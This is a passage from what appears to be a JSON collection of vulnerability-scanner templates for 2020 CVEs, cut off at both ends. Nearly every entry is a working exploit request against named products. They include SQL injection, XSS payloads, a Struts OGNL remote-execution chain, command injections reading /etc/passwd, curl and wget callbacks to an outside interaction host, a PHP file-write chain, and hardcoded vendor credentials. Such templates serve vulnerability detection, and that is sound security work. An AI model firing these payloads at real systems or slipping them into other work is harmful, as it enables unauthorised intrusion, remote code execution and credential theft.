5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-10220","info":{"name":"rConfig 3.9 - SQL injection","severity":"critical"},"requests":[{"raw":["GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21012","info":{"name":"Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /forgot_password.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbtn_forgot=1&email=1%27%20or%20sleep(6)%23\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Hotel Booking System\")"],"condition":"and"}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: 